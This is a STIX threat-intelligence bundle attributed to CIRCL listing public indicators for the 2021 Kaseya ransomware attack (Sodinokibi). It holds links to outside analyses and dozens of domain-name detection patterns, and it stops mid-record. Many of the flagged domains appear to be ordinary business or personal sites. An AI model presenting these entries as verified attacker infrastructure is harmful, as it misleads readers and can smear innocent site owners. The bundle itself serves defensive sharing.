{ "type": "bundle", "id": "bundle--e0eaf6f2-a12c-4b31-9d19-f77faf1ea4c9", "objects": [ { "type": "identity", "spec_version": "2.1", "id": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-07T09:35:07.000Z", "modified": "2021-07-07T09:35:07.000Z", "name": "CIRCL", "identity_class": "organization" }, { "type": "report", "spec_version": "2.1", "id": "report--e0eaf6f2-a12c-4b31-9d19-f77faf1ea4c9", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-07T09:35:07.000Z", "modified": "2021-07-07T09:35:07.000Z", "name": "Kaseya ransomware attack - indicators and information publicly available", "published": "2021-07-07T09:47:39Z", "object_refs": [ "observed-data--0e569e9a-17bd-4af6-b785-f83596b7a97a", "url--0e569e9a-17bd-4af6-b785-f83596b7a97a", "observed-data--89531d9a-c947-4bd8-a84c-68b4e89d2446", "url--89531d9a-c947-4bd8-a84c-68b4e89d2446", "indicator--580a5488-69c5-4019-83e1-02879ea0ac22", "indicator--d1092ff9-f976-4029-9c29-7af01d6759b2", "indicator--34d82c52-13de-4f37-9a70-336feae63b6a", "indicator--5b08c28f-2d33-4075-b8b2-a8cea74dafa5", "indicator--6c041cd6-b04e-4130-9aed-3140d3f3b78b", "indicator--02484f6e-c50d-4b26-bdd2-aa14c3ebab2e", "indicator--1ae94e8f-be1f-487f-81d6-cd519663ddef", "indicator--da43a1ec-a1b6-441c-8ea5-48d64cc8e226", "indicator--75c79264-1974-4aa2-b2c6-480ec8e7970d", "indicator--3da15a87-1fb3-4d69-aa35-3efa20b7c701", "indicator--5ae32a41-e5ad-49a0-934f-a0adc913c7d9", "indicator--ec97ce8b-b674-4689-8720-5100614bcbbb", "indicator--b5135450-e1fc-4c49-991a-f3042d3f21cf", "indicator--93d7c230-354b-4378-bb4b-9c9d5fc76265", "indicator--58593514-a54d-4eeb-807d-a9d448bac80f", "indicator--aa9d2ada-9102-4ab7-a846-2c53f53db035", "indicator--27fbdd1c-83e3-421a-bb3b-ae83c8bd24c2", "indicator--085927fc-1a26-43a9-878e-e6ba9aff2869", "indicator--d403cb96-0385-4ded-ae2d-2d9c80445eb2", "indicator--b5946dfb-7a24-471c-b661-150a3f67c2e6", "indicator--a6382aea-9681-4d3c-b031-cedb56900b78", "indicator--7e14c5bd-5522-4085-8de9-67885ef022cf", "indicator--bca4585a-5cb3-45c1-956b-5516f184be9c", "indicator--2429561d-6b7a-46d3-9d6d-13a0bd99409b", "indicator--57fc5262-d25d-4c17-b714-8caa54a91e36", "indicator--7128f692-5453-41ea-9ee3-f3aa47802b39", "indicator--9cdaccaa-2179-439f-8579-5e8f26e12c92", "indicator--c4024a8b-c8ea-4cdf-aba7-084fdf316969", "indicator--32018026-7020-45fa-8e1d-c835a796fa9b", "indicator--e5faad77-39b0-4d55-b83c-e35302d03d21", "indicator--5e62790f-3493-449c-acb1-d4adfab3f4a9", "indicator--46272f67-9303-4f9b-acf0-97ea54e7eae2", "indicator--7c089669-43c3-42d9-8c2c-7f3d717281aa", "indicator--a489899c-c4f4-46dd-a596-f9d165cc75f9", "indicator--cc0a65b6-d4ac-4486-afb1-da22800a25bd", "indicator--dfac7576-54ff-41ec-a759-a4e362fd78e3", "indicator--b1c574bc-446c-437d-ac2f-31fe56889df8", "indicator--bbdf4eb4-3f5f-435e-81a3-27eeea6ab88b", "indicator--38f1ecc6-4e89-40db-a826-c2eda523f946", "indicator--3275524c-6128-4a8e-86c5-3aa90362f9e3", "indicator--9c0ffa35-e772-4341-b04b-8c63a3385982", "indicator--0dedcd10-8c29-4647-80f1-8eca7d58bef2", "indicator--575f1379-0074-410a-9433-49b8b9958118", "observed-data--10036ce7-76fb-44b5-95ec-aa98744391b2", "url--10036ce7-76fb-44b5-95ec-aa98744391b2", "observed-data--0a0a5eaa-39aa-474e-91f7-16818eb45441", "url--0a0a5eaa-39aa-474e-91f7-16818eb45441", "indicator--86947a18-f1ed-4ef9-bdfc-cd6d5f586179", "indicator--83cac77f-3395-4e66-8748-4a3c93f13f9f", "indicator--0bb49474-a26d-448c-a5fe-6a646bae941d", "indicator--94d2a666-8901-4fdd-b637-12cd14214ed9", "indicator--382db752-d40a-44b4-8043-8ed41ad534df", "x-misp-object--f5e08151-622f-4b0f-9a5f-3b329b8da50c", "indicator--b5e68470-eac8-4708-9c02-bd24d67639d9", "x-misp-object--6b906ba0-33c1-4070-8962-49359d7ab1e1", "x-misp-object--66a1099e-fc17-4447-a35a-671d1dce2b3a", "indicator--b86e6a60-1bc6-4b06-9816-7d253d8136af", "indicator--92efa833-8ea8-49ee-9d46-5fedbf946d46", "indicator--22682f05-d593-4378-983c-e247b5f6df07", "indicator--f1a24c1c-d479-447e-abbe-dfc97c485829", "indicator--e0115c11-ab7d-4d4c-a7a2-078a8dc6b6dd", "indicator--80fca50b-89b9-4331-9b9a-6a62e7080126", "indicator--e489c678-49cd-4f79-a70b-9b3de81bd252", "indicator--a855e025-6cbb-4c93-9585-95121ea5c55c", "x-misp-object--f42f63de-36c2-41d3-86d1-d1e3e3508da1", "x-misp-object--67af034f-5173-445b-ae08-1f1a7e9a7f87", "x-misp-object--e6a7fd5d-ff89-4a3f-840f-892e99de748b", "x-misp-object--cd7445c8-4121-45e1-a294-121ec9d35d8e", "x-misp-object--f722ecce-fb4e-44f6-a2ed-f40f4fd96f11", "x-misp-object--0ff15772-0b74-45a7-b805-f2a4363639d1", "relationship--1b551a7c-1d52-497a-8eb7-ddc39717c2a1", "relationship--f1e68dce-2415-4c97-8dc5-8462985248dc", "relationship--3154082f-b1cd-4d18-8139-e5a25682aa21", "relationship--4d8d7fa4-3bea-4bf9-97e0-d585b262980a", "relationship--1a3e175a-43e5-4c38-bd6f-6c657acd3785", "relationship--a37c72bd-2565-4cae-93f4-f56a5b57d4d7", "relationship--975070c8-f353-432c-9f2d-9c7383661ec0" ], "labels": [ "Threat-Report", "misp:tool=\"MISP-STIX-Converter\"", "type:OSINT", "osint:lifetime=\"perpetual\"", "osint:certainty=\"50\"", "misp-galaxy:ransomware=\"Sodinokibi\"", "misp-galaxy:mitre-attack-pattern=\"Data Encrypted for Impact - T1486\"" ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "observed-data", "spec_version": "2.1", "id": "observed-data--0e569e9a-17bd-4af6-b785-f83596b7a97a", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:00:04.000Z", "modified": "2021-07-05T08:00:04.000Z", "first_observed": "2021-07-05T08:00:04Z", "last_observed": "2021-07-05T08:00:04Z", "number_observed": 1, "object_refs": [ "url--0e569e9a-17bd-4af6-b785-f83596b7a97a" ], "labels": [ "misp:type=\"link\"", "misp:category=\"External analysis\"" ] }, { "type": "url", "spec_version": "2.1", "id": "url--0e569e9a-17bd-4af6-b785-f83596b7a97a", "value": "https://twitter.com/r3c0nst/status/1411922502553673728" }, { "type": "observed-data", "spec_version": "2.1", "id": "observed-data--89531d9a-c947-4bd8-a84c-68b4e89d2446", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:05:55.000Z", "modified": "2021-07-05T08:05:55.000Z", "first_observed": "2021-07-05T08:05:55Z", "last_observed": "2021-07-05T08:05:55Z", "number_observed": 1, "object_refs": [ "url--89531d9a-c947-4bd8-a84c-68b4e89d2446" ], "labels": [ "misp:type=\"link\"", "misp:category=\"External analysis\"" ] }, { "type": "url", "spec_version": "2.1", "id": "url--89531d9a-c947-4bd8-a84c-68b4e89d2446", "value": "https://github.com/cado-security/DFIR_Resources_REvil_Kaseya" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--580a5488-69c5-4019-83e1-02879ea0ac22", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:43.000Z", "modified": "2021-07-05T08:10:43.000Z", "pattern": "[domain-name:value = 'ncuccr.org']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:43Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--d1092ff9-f976-4029-9c29-7af01d6759b2", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:43.000Z", "modified": "2021-07-05T08:10:43.000Z", "pattern": "[domain-name:value = '1team.es']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:43Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--34d82c52-13de-4f37-9a70-336feae63b6a", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:43.000Z", "modified": "2021-07-05T08:10:43.000Z", "pattern": "[domain-name:value = '4net.guru']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:43Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5b08c28f-2d33-4075-b8b2-a8cea74dafa5", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:43.000Z", "modified": "2021-07-05T08:10:43.000Z", "pattern": "[domain-name:value = '35-40konkatsu.net']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:43Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--6c041cd6-b04e-4130-9aed-3140d3f3b78b", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:43.000Z", "modified": "2021-07-05T08:10:43.000Z", "pattern": "[domain-name:value = '123vrachi.ru']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:43Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--02484f6e-c50d-4b26-bdd2-aa14c3ebab2e", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = '4youbeautysalon.com']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--1ae94e8f-be1f-487f-81d6-cd519663ddef", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = '12starhd.online']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--da43a1ec-a1b6-441c-8ea5-48d64cc8e226", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = '101gowrie.com']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--75c79264-1974-4aa2-b2c6-480ec8e7970d", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = '8449nohate.org']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--3da15a87-1fb3-4d69-aa35-3efa20b7c701", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = '1kbk.com.ua']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"hostname\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ae32a41-e5ad-49a0-934f-a0adc913c7d9", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = '365questions.org']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--ec97ce8b-b674-4689-8720-5100614bcbbb", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = '321play.com.hk']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"hostname\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--b5135450-e1fc-4c49-991a-f3042d3f21cf", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'candyhouseusa.com']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--93d7c230-354b-4378-bb4b-9c9d5fc76265", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'andersongilmour.co.uk']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"hostname\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--58593514-a54d-4eeb-807d-a9d448bac80f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'facettenreich27.de']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--aa9d2ada-9102-4ab7-a846-2c53f53db035", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'blgr.be']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--27fbdd1c-83e3-421a-bb3b-ae83c8bd24c2", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'fannmedias.com']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--085927fc-1a26-43a9-878e-e6ba9aff2869", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'southeasternacademyofprosthodontics.org']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--d403cb96-0385-4ded-ae2d-2d9c80445eb2", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'filmstreamingvfcomplet.be']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--b5946dfb-7a24-471c-b661-150a3f67c2e6", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'smartypractice.com']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--a6382aea-9681-4d3c-b031-cedb56900b78", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'tanzschule-kieber.de']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--7e14c5bd-5522-4085-8de9-67885ef022cf", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'iqbalscientific.com']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--bca4585a-5cb3-45c1-956b-5516f184be9c", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'pasvenska.se']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--2429561d-6b7a-46d3-9d6d-13a0bd99409b", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'cursosgratuitosnainternet.com']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--57fc5262-d25d-4c17-b714-8caa54a91e36", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'bierensgebakkramen.nl']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--7128f692-5453-41ea-9ee3-f3aa47802b39", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'c2e-poitiers.com']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--9cdaccaa-2179-439f-8579-5e8f26e12c92", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'gonzalezfornes.es']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--c4024a8b-c8ea-4cdf-aba7-084fdf316969", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'tonelektro.nl']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--32018026-7020-45fa-8e1d-c835a796fa9b", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'milestoneshows.com']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--e5faad77-39b0-4d55-b83c-e35302d03d21", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'blossombeyond50.com']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5e62790f-3493-449c-acb1-d4adfab3f4a9", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'thomasvicino.com']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--46272f67-9303-4f9b-acf0-97ea54e7eae2", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'kaotikkustomz.com']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--7c089669-43c3-42d9-8c2c-7f3d717281aa", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'mindpackstudios.com']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--a489899c-c4f4-46dd-a596-f9d165cc75f9", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'faroairporttransfers.net']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--cc0a65b6-d4ac-4486-afb1-da22800a25bd", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'daklesa.de']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--dfac7576-54ff-41ec-a759-a4e362fd78e3", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'bxdf.info']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--b1c574bc-446c-437d-ac2f-31fe56889df8", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'simoneblum.de']", 